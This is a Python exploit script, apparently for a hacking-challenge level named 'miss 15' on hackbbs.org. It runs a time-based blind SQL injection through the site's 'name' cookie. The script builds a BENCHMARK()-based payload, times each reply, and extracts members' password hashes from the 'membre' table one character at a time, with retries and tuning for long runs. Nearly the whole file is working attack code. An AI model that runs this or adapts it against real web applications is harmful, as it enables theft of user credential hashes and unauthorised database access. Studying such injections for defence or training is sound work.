#! /usr/bin/env python

import sys
import time

try:
    import httplib                      # Python 2
except ImportError:                     # Python 3: same API under a new name
    import http.client as httplib

### Time-based blind SQL injection
### PoC: recovers the password hashes of members (the `membre` table)
### Author : Onemore
### Injection point: the NAME cookie field
### Usage ./Time_Based_sqli_miss15.py Username
# candidate character set for one hash position
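# Candidate characters for one position of the hash.  The sixteen hex digits
# cover a hex-encoded digest (32 positions are probed, i.e. MD5-sized); the
# order is the original author's and only changes how soon a hit is found.
charset = ['0', '9', '8', '7', '6', '5', '4', '3', '2', '1',
           'a', 'b', 'c', 'd', 'e', 'f']

# Target and pacing.  The defaults reproduce the original behaviour.
HOST = "hackbbs.org"
PATH = "/miss/15/gene.php"
DEFAULT_SESSION = "xxxxxxxxxxx"    # placeholder; pass a real PHPSESSID as argv[2]
HASH_LENGTH = 32                   # number of hash positions to recover
PAUSE = 10                         # seconds slept before every single probe
DELAY_THRESHOLD = 3.0              # seconds; a slower reply means "condition true"
BENCHMARK_ROUNDS = 25000000        # BENCHMARK() iterations (the author's ENCODE label suggests ~5 s)
UNKNOWN = '?'                      # written when no candidate produced the delay
PROBE_ATTEMPTS = 3                 # transport retries per probe before giving up


def target_name(username):
    """Normalise a user-supplied name into the form the injected LIKE expects.

    The name is reversed and upper-cased, as in the original script (the
    author's own nick 'Onemore' appears as 'EROMENO' in the cookie, so the
    application apparently stores names that way).  The value is interpolated
    into a single-quoted SQL literal as-is: a quote or backslash would break
    the payload, and an empty name would make ``LIKE '%%'`` match every
    member, so both are refused.  '%' and '_' keep their LIKE wildcard meaning.

    Raises ValueError on an empty name or one containing ' or \\.
    """
    if not username:
        raise ValueError("username must not be empty")
    if "'" in username or "\\" in username:
        raise ValueError("username must not contain a quote or backslash")
    return username[::-1].upper()


def build_cookie(position, candidate, nom, session_id=DEFAULT_SESSION):
    """Return the Cookie header value that probes one hash character.

    The injection lives in the ``name`` cookie.  The IF() runs BENCHMARK()
    (a measurable delay) only when the byte at ``position`` (1-based, as for
    MySQL SUBSTRING) of ``pass`` for the member whose name matches ``nom``
    equals ``candidate``; otherwise it yields the constant '1337'.

    NOTE(review): the scalar subquery uses ``LIKE '%nom%'``; if several
    members match, it presumably errors out instead of delaying, so every
    position would come back unknown.  Use a name that is specific enough.
    """
    injected = (
        "EROMENO',(if((SELECT ORD(SUBSTRING(pass,{pos},1)) FROM membre "
        "WHERE name LIKE '%{nom}%')={code},"
        "BENCHMARK({rounds},ENCODE('MSG','by 5 seconds')),'1337')),1393697800)#"
    ).format(pos=position, nom=nom, code=ord(candidate), rounds=BENCHMARK_ROUNDS)
    return "PHPSESSID=%s; name=%s" % (session_id, injected)


def probe(cookie, host=HOST, path=PATH, attempts=PROBE_ATTEMPTS):
    """Send one GET carrying ``cookie`` and return the round trip in seconds.

    The clock starts before the request is sent (the original started it
    after, under-counting) and stops once the body has been drained, so the
    measurement covers the whole server-side work.  Transport errors are
    retried ``attempts`` times because losing a multi-hour extraction to one
    dropped connection is not acceptable; the last error is re-raised.
    """
    last_error = None
    for _ in range(attempts):
        conn = httplib.HTTPConnection(host)
        started = time.time()
        try:
            conn.request("GET", path, headers={"Cookie": cookie})
            response = conn.getresponse()
            response.read()
            return time.time() - started
        except (IOError, httplib.HTTPException) as err:
            last_error = err
        finally:
            conn.close()  # the original leaked one connection per probe
    raise last_error


def extract_hash(nom, session_id=DEFAULT_SESSION, length=HASH_LENGTH,
                 pause=PAUSE, threshold=DELAY_THRESHOLD, send=probe, log=None):
    """Recover ``length`` hash characters for the member matching ``nom``.

    For every position each candidate of ``charset`` is probed in turn; the
    first one whose reply takes longer than ``threshold`` seconds is taken.
    When no candidate is slow enough the position is recorded as UNKNOWN
    instead of being silently skipped, so later characters stay aligned
    (the original shifted the whole tail left in that case).

    ``send`` receives the cookie string and returns elapsed seconds; ``log``
    receives one progress line per position.  Both exist so the loop can be
    exercised without a network.
    """
    if log is None:
        log = print
    recovered = ''
    for position in range(1, length + 1):
        found = UNKNOWN
        for candidate in charset:
            time.sleep(pause)
            elapsed = send(build_cookie(position, candidate, nom, session_id))
            if elapsed > threshold:
                found = candidate
                break
        if found == UNKNOWN:
            log("no candidate produced the delay at position %d; "
                "check the session id and the timing threshold" % position)
        recovered += found
        log("Hash en cours.... " + recovered)
    return recovered


def main(argv=None):
    """Entry point: ``Time_Based_sqli_miss15.py Username [PHPSESSID]``.

    Returns a process exit status (0 on success, 2 on bad usage).
    """
    args = sys.argv[1:] if argv is None else argv
    if not args:
        sys.stderr.write("usage: %s Username [PHPSESSID]\n" % sys.argv[0])
        return 2
    try:
        nom = target_name(args[0])
    except ValueError as err:
        sys.stderr.write("error: %s\n" % err)
        return 2
    session_id = args[1] if len(args) > 1 else DEFAULT_SESSION
    recovered = extract_hash(nom, session_id)
    print("User : " + nom[::-1])
    print("Hash : " + recovered)
    return 0


if __name__ == "__main__":
    sys.exit(main())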


